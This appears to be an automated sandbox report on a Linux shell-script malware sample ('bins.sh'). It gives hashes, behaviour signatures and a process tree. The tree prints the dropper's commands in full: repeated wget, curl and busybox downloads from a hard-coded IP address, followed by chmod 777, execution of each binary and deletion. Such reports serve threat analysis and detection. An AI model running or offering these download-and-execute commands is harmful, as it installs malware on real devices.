Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
27-10-2024 20:58
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
dbb43f362c91c1a79b8656e0ca23f39b
-
SHA1
15e807ece2b9c17b0d6592aa1a35166dfe525bb9
-
SHA256
a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747
-
SHA512
cd1182e280fca2287bab8b4c22bb0547001984e0bb1ac54d9ca835ab492171fbb029824bb509d7e7bc89a9a4bd149e5878697f512ebcb50eacc25363e63d6337
-
SSDEEP
192:8E3WGpEx79Q888Y8uBpzGL3UltItlWfjIyvCL3Ultq888Y8uBpEtlWfjyrE37x7+:8jGpEx79Q888Y8uBpzatlWfjIyvE888Z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodpid process 735 chmod 755 chmod 792 chmod 834 chmod 842 chmod 727 chmod -
Executes dropped EXE 6 IoCs
Processes:
GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6MszSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWtxVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVFCApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRsjvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOaDClRpPhKWm7jbpiA8C2DV4zvRlujWEQheBioc pid process /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 729 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt 736 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF 757 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs 793 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa 835 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB 843 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB -
Processes:
curlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetwgetcurlbusyboxcurlbusyboxwgetcurlcurlwgetcurlwgetcurlbusyboxwgetwgetcurlbusyboxbusyboxdescription ioc process File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt busybox File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF wget File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs wget File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs curl File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs busybox File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms busybox File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt wget File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S curl File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa curl File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB wget File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB curl File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S wget File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF busybox File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa wget File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms wget File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF curl File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB busybox File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Writes file to tmp directory
PID:704
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:715
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Writes file to tmp directory
PID:726
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:731
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Writes file to tmp directory
PID:732
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Writes file to tmp directory
PID:734
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Writes file to tmp directory
PID:739
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Writes file to tmp directory
PID:746
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Writes file to tmp directory
PID:761
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Writes file to tmp directory
PID:784
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Writes file to tmp directory
PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Writes file to tmp directory
PID:833
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Writes file to tmp directory
PID:838
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Writes file to tmp directory
PID:841
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Writes file to tmp directory
PID:846
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
80KB
MD522c527269cbd9b42f4ade79f52757efb
SHA1c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA5127b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53
-
Filesize
108KB
MD5c97a9c55ddb153e8bfce38f201d2cffb
SHA13970452f27327f98c2e3fdcabf0390067b48bd62
SHA256138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA5121734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
SHA123796112f2cce2afb2217498b5ecf2801ab550f2
SHA256d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA5129532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
-
Filesize
93KB
MD527a1a1941f224eff6a4babf2495e3692
SHA186fae66a698f6280353e470ffadfb64441b03e83
SHA256ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179
SHA512cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934
-
Filesize
16KB
MD53f09ed0dc221d87bcd4142a92974214b
SHA1c8cc6d8a719b0b512aad6911e67bdb3b0ba74db9
SHA25647e23b4fdc7349f56feb4f333cbb2aacb644b9eb9dd82f7c6efffdab7518cb61
SHA512426ac9d8b24e6c318593a0ece8fe174a01f863fb0c6557f584de3c28283310c56d279b46a16669bfecc881a46dff7975cdf50b9d754684f556f15ca5e8c17a65
-
Filesize
122KB
MD5aadb8cc4b6eac7fce760c09262693884
SHA1b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA5125567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA5122767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df